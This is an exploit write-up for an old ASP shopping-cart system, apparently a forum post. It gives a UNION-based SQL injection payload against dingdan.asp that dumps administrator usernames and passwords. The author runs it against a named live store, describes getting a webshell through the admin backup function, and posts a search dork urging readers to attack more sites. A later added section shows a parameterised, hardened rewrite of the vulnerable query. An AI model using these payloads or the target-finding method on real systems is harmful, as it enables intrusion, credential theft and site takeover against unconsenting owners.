Author: flaw0r
Version: v1.1a Build 20090413 Access Free

Vulnerability 1: SQL injection in dingdan.asp
Severity: Critical

Vulnerable code:

dingdan=request.QueryString("dan")
set rs=server.CreateObject("adodb.recordset")
' "dan" from the query string and the username from the "bjx" cookie are concatenated straight into the SQL string
rs.open "select BJX_goods.bookid,BJX_goods.shjiaid,BJX_goods.bookname,BJX_goods.shichangjia,BJX_goods.huiyuanjia, " & _
        "bjx_action.actiondate,bjx_action.shousex,bjx_action.danjia,bjx_action.feiyong,bjx_action.fapiao, " & _
        "bjx_action.userzhenshiname,bjx_action.shouhuoname,bjx_action.dingdan,bjx_action.youbian, " & _
        "bjx_action.liuyan,bjx_action.zhifufangshi,bjx_action.songhuofangshi,bjx_action.zhuangtai, " & _
        "bjx_action.zonger,bjx_action.useremail,bjx_action.usertel,bjx_action.shouhuodizhi, " & _
        "bjx_action.bookcount,bjx_action.star, bjx_action.pingjia " & _
        "from BJX_goods inner join bjx_action on BJX_goods.bookid=bjx_action.bookid " & _
        "where bjx_action.username='" & request.Cookies("bjx")("username") & "'and dingdan='" & dingdan & "'", conn, 1, 1

Injection test string:

http://192.168.1.3/yhshop/dingdan.asp?dan=2009422172358'%20and%201=2%20union%20select%201,2,admin,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,password,24,25%20from %20BJX_admin%20where%20'1'='1

Honestly, this system leaves me speechless. It shares a kernel with the BOBO web shop system I analyzed earlier, so its vulnerabilities are more or less the same as BOBO's; here I only give one injection vulnerability. I really don't know what people are thinking these days: take someone else's program, tweak it, and make money off it? I despise people who steal other people's source code and sell it! (I'm not saying the author of this program plagiarized anyone; the copy I got was free too. BOBO gets my contempt first.)

The admin backend has a backup function, so getting a shell is relatively simple.

Live test:

Search Baidu for: 易和阳光购物商城
Chosen target: http://eshop.iheeo.com/

First register a user, pick any product and place an order, then go to the member center and view that order.
Submit our test statement:

http://eshop.iheeo.com/dingdan.asp?dan=2009423113536'%20and%201=2%20union%20select%201,2,admin,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,password,24,25%20from%20BJX_admin%20where%20'1'='1

and the usernames and passwords of all administrators are dumped.
With the admin password, log into the backend and obtain a webshell through the database backup function.

Tip: a Google search for inurl:product.asp?Iheeoid= finds some sites running this system. Go for it, everyone!
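As an added example that is not part of the original post or the vendor's code: the same order lookup in dingdan.asp rewritten with an ADODB.Command and bound parameters, so the "dan" value and the cookie username are passed to Access as data instead of being concatenated into the SQL. It assumes an already-open connection object conn and the cookie layout from the original snippet; the column list is shortened.

```vbscript
<%
' Hardened rewrite of the dingdan.asp lookup (added example, not the original code).
' Both user-controlled values, the "dan" query parameter and the "bjx" cookie's
' username, are bound as parameters rather than spliced into the SQL string.
' Assumes an open ADODB.Connection named conn, as in the original snippet.
Option Explicit

Const adCmdText = 1
Const adVarChar = 200
Const adParamInput = 1

Dim dingdan, username, cmd, rs, re
dingdan  = Request.QueryString("dan")
username = Request.Cookies("bjx")("username")

' Reject anything that does not look like an order number before touching the database.
' The order numbers in the post are all-digit timestamps, so this check is deliberately
' strict; widen the pattern if the real format differs.
Set re = New RegExp
re.Pattern = "^[0-9]{1,20}$"
If Not re.Test(dingdan) Then
    Response.Status = "400 Bad Request"
    Response.Write "invalid order number"
    Response.End
End If

Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
' Column list shortened for the example; the real query selects every order field.
cmd.CommandText = "SELECT BJX_goods.bookid, BJX_goods.bookname, bjx_action.dingdan, " & _
                  "bjx_action.zonger, bjx_action.zhuangtai " & _
                  "FROM BJX_goods INNER JOIN bjx_action ON BJX_goods.bookid = bjx_action.bookid " & _
                  "WHERE bjx_action.username = ? AND bjx_action.dingdan = ?"
' Parameters bind positionally to the ? placeholders (supported by the Jet/Access OLE DB provider).
' Binding stops injection; it does not make the plain cookie a trustworthy identity, so the
' username should ultimately come from a server-side session rather than a client cookie.
cmd.Parameters.Append cmd.CreateParameter("username", adVarChar, adParamInput, 50, username)
cmd.Parameters.Append cmd.CreateParameter("dingdan", adVarChar, adParamInput, 50, dingdan)

Set rs = cmd.Execute
If rs.EOF Then
    Response.Write "order not found"
Else
    ' Encode on output so stored values cannot inject HTML into the page.
    Response.Write Server.HTMLEncode(rs("bookname")) & " - " & Server.HTMLEncode(rs("zonger"))
End If
rs.Close
%>
```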